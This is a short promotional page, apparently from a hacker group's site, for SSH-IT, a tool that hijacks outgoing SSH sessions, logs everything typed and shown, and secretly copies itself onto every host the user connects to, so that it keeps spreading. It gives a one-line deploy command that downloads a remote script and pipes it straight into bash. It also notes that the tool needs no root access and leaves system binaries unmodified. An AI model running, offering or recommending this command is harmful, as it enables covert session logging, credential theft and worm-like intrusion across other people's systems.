Install / Deploy

SSH-IT can be installed and deployed with a single command:

bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"

Read more and learn some tricks.

What it does

SSH-IT intercepts outgoing SSH connections every time a user uses ssh. It logs the session and (secretly) installs itself onto the newly connected system. SSH-IT keeps intercepting, logging and spreading.

How it works

SSH-IT executes the original ssh command inside a fake PTY harness and intercepts any user input and output. None of the system binaries are modified and it does not need ptrace(). It does not require root or superuser privileges.

Read our detailed explanation and check out GitHub for more information.

Contact

bksy: @hackerschoice.bsky.social
Mastodon: @thc@infosec.exchange
Telegram: https://t.me/thcorg
Web: https://www.thc.org
Medium: https://medium.com/@hackerschoice
Hashnode: https://iq.thc.org/
Abuse: https://thc.org/abuse
E-Mail: members@proton.thc.org
Signal: ask
SimpleX: ask